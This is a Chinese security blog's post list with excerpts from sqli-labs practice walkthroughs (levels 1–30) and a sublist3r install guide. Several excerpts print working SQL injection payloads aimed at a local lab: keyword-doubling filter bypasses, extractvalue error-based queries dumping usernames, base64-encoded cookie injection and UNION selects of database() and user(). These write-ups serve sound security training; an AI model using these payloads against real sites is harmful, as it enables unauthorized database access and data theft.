- 博客(7)
- 收藏
- 关注
RSS订阅原创 sqli-labs靶场实战25-30题
Less-25 过滤or和and,过滤方式是将其替换为空,使用双重字符可绕过,如oorr,anandd。 单引号注入判断http://127.0.0.1/sql/Less-25/?id=1' anandd 1=2 -- - 异常http://127.0.0.1/sql/Less-25/?id=1' anandd 1=1 -- - 登录成功 报错注入http://127.0.0.1/sql/Less-25/?id=1' anandd update...
2022-02-28 18:58:11
4053
原创 SQLI-LIBS靶场23-24 #过滤以及二次注入实战
Less-23 Get型单引号报错注入 输入过滤了-- # 并替代成空,故采用单引号闭合http://127.0.0.1/sql/Less-23/?id=1' and 1='1 直接搜索已知的数据,成功http://127.0.0.1/sql/Less-23/?id=1' and extractvalue(1,concat(0x7e,(select username from users limit 0,1),0x7e)) and 1='1Le...
2021-11-03 16:31:54
348
原创 SQLI-LIBS靶场21-22 cookie base64加密实战
Less-21 Cookie处单引号+)注入,base64编码 Cookie:uname= YWRtaW4nKSM= 绕过了 直接搜索前面获取的信息,成功admin') and extractvalue(1,concat(0x7e,(select username from users limit 0,1),0x7e))#YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGV...
2021-09-28 16:05:30
207
原创 SQLI-LIBS POST型特殊位置注入18-20题实战
目录Less-18Less-19Less-20Less-18 单引号user-agent注入判断 根据报错构造1',1,1)# 验证成功1',1,1‘)# 报错 说明构造的闭合语句成立 构造后语句如下INSEERT INTO table VALUES('1' ,1,1)#','Ip','Username'),成功绕过 使用报错注入,直接检索前面获取的信息1',1,extractvalue(1,concat...
2021-09-24 15:58:55
990
原创 SQLI-LIBS POST型注入11-17题实战
目录Less-11less-12Less-13Less-14Less-15Less-16Less-17Less-11 POST ‘单引号注入 判断显示位uname=&passwd=' union select 1,2 -- - 确认显示位为1和2 数据库名和数据库用户uname=&passwd=' union select user(),database()-- - security和root@local...
2021-09-23 15:50:13
346
原创 SQLI_LIBS靶场搭建与1-10GET型注入实战
靶场搭建与1-10GET型注入实战目录靶场搭建与1-10GET型注入实战环境准备靶场环境初始化Less-1Less-2Less-3Less-4Less-5Less-6Less-7Less-8Less-9Less-10环境准备下载phpstudyhttps://www.xp.cn/下载sqli-labs靶场环境https://github.com/Audi-1/sqli-labs运行phpstudy环境,开启apache和mysq
2021-09-03 16:55:07
588
原创 kali中安装使用sublist3r
目录前言1.下载sublist3r2.查看下载的包内容3.安装必要组件4.安装工具5.运行工具6.运行效果7.参数说明前言sublist3r是一款基于python的子域名捕捉工具,该工具可以利用多种搜索引擎的API,如Google、Bing、Baidu和ASK,也可以在NetCraft、Virustotal、ThreatCrowd、DNSdumpster和reverseDNS中搜索,还可以利用特定词库实施暴力破解。本文记录了自己在kali中安装sublis..
2021-08-16 17:19:13
6774
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人